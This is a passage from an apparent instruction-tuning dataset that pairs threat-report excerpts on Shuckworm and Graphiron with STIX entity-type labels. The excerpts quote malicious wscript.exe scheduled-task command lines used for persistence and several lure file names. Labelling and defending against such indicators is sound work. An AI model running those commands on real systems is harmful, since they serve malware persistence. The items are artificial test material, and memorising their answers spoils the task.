a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nshtasks.exe\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nBroadcom\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nevidence.rtf.lnk\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nrtk.lnk\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nTelegraph\n\n---\n\n### Text Passage:\nShuckworm tactics, techniques, and procedures\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. The attackers send emails with malicious attachments to Ukrainian victims, with the attachments of various file types, such as:\n* .docx\n* .rar (RAR archive files)\n* .sfx (self-extracting archives)\n* .lnk\n* .hta (HTML smuggling files)\nThe victim lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\nOnce victims were infected, the attackers then proceed to download additional backdoors and tools onto targeted machines.\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Researchers from Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting how we had found four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (shtasks.exe) to maintain persistence, and download additional code from a command-and-control (C&C) server.\nExamples of recent scheduled tasks include execution of the following command lines:\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\n* CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\n* wscript.exe \"C:\\Users\\\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\nThe new PowerShell script is used to first copy itself onto the infected machine and create a shortcut file using an _rtk.lnk_ extension. The script uses file names such as \u201cporn_video.rtf.lnk\u201d, \u201cdo_not_delete.rtf.lnk\u201d\u201d and \u201cevidence.rtf.lnk\u201d in an attempt to entice individuals to open the files. These file names are generally in Ukrainian, but some are also in English.\nNext, the script enumerates all drives, copying itself to any available removable disks \u2013 USB drives. These USB drives are likely used by the attackers for lateral movement across victim networks and may be used to help the attackers reach air-gapped machines within targeted organizations.\nIn this recent activity, we also observed the group leveraging legitimate services to act as C&C servers, including using the Telegram messaging service for its C&C infrastructure. More recently, they have also used Telegram\u2019s micro-blogging platform, called Telegraph, to store C&C addresses.\nFigure 1. Threat actors use Telegraph to store C&C addresses\nShuckworm tends to only use its C&C infrastructure for short periods of time, limiting the usefulness of its C&Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C&C deployment. These data points can help researchers to identify additional C&C infrastructure and Shuckworm activity.\nSymantec also saw what was likely Giddome, an infostealer tool that is a known Shuckworm backdoor, deployed onto victim networks to steal and exfiltrate data of interest.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nC&C\n\n---\n\n### Text Passage:\nSimilarity to older tools\nGraphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant, which were first discovered by CERT-UA. GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell. Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.\nIn addition to this, as with earlier malware, Graphiron communicates with the C&C server using port 443 and communications are encrypted using the AES cipher.\nTable 2: Comparison between Graphiron and older Nodaria tools (GraphSteel and GrimPlant)Malware Go version Internal name Obfuscation Libraries used\n---------------\nInfostealer.Graphiron 1.18 n/a yes jcmturner/aescts, buger/jsonparser, golang/protobuf, kbinani/screenshot, lxn/win, mattn/go-sqlite, tidwall/gjson, anmitsu/go-shlex\nDownloader.Graphiron 1.18 n/a yes jcmturner/aescts\nGraphSteel 1.16 Elephant no buger/jsonparser, aglyzov/charmap, denisbrodbeck/machineid, gorilla/websocket, jcmturner/aescts, matn/go-sqlite, tidwall/gjson\nGrimPlant 1.16 Elephant no jcmturner/aescts, denisbrodbeck/machineid, golang/protobuf, kbinani/screenshot, lxn/win, anmitsu/go-shlex\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nNodaria\n\n---\n\n### Text Passage:\nSimilarity to older tools\nGraphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant, which were first discovered by CERT-UA. GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell. Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.\nIn addition to this, as with earlier malware, Graphiron communicates with the C&C server using port 443 and communications are encrypted using the AES cipher.\nTable 2: Comparison between Graphiron and older Nodaria tools (GraphSteel and GrimPlant)Malware Go version Internal name Obfuscation Libraries used\n---------------\nInfostealer.Graphiron 1.18 n/a yes jcmturner/aescts, buger/jsonparser, golang/protobuf, kbinani/screenshot, lxn/win, mattn/go-sqlite, tidwall/gjson, anmitsu/go-shlex\nDownloader.Graphiron 1.18 n/a yes jcmturner/aescts\nGraphSteel 1.16 Elephant no buger/jsonparser, aglyzov/charmap, denisbrodbeck/machineid, gorilla/websocket, jcmturner/aescts, matn/go-sqlite, tidwall/gjson\nGrimPlant 1.16 Elephant no jcmturner/aescts, denisbrodbeck/machineid, golang/protobuf, kbinani/screenshot, lxn/win, anmitsu/go-shlex\n",
"output": "THREAT_ACTOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nPowerShell\n\n---\n\n### Text Passage:\nSimilarity to older tools\nGraphiron has some similarities with older Nodaria tools such as GraphSteel and GrimPlant, which were first discovered by CERT-UA. GraphSteel is designed to exfiltrate files along with system information and credentials stolen from the password vault using PowerShell. Graphiron has similar functionality but can exfiltrate much more, such as screenshots and SSH keys.\nIn addition to this, as with earlier malware, Graphiron communicates with the C&C server using port 443 and communications are encrypted using the AES cipher.\nTable 2: Comparison between Graphiron and older Nodaria tools (GraphSteel and GrimPlant)Malware Go version Internal name Obfuscation Libraries used\n---------------\nInfostealer.Graphiron 1.18 n/a yes jcmturner/aescts, buger/jsonparser, golang/protobuf, kbinani/screenshot, lxn/win, mattn/go-sqlite, tidwall/gjson, anmitsu/go-shlex\nDownloader.Graphiron 1.18 n/a yes jcmturner/aescts\nGraphSteel 1.16 Elephant no buger/jsonparser, aglyzov/charmap, denisbrodbeck/machineid, gorilla/websocket, jcmturner/aescts, matn/go-sqlite, tidwall/gjson\nGrimPlant 1.16 Elephant no jcmturner/aescts, denisbrodbeck/machineid, golang/protobuf, kbinani/screenshot, lxn/win, anmitsu/go-shlex\n",
"output": "TOOL"
},
{
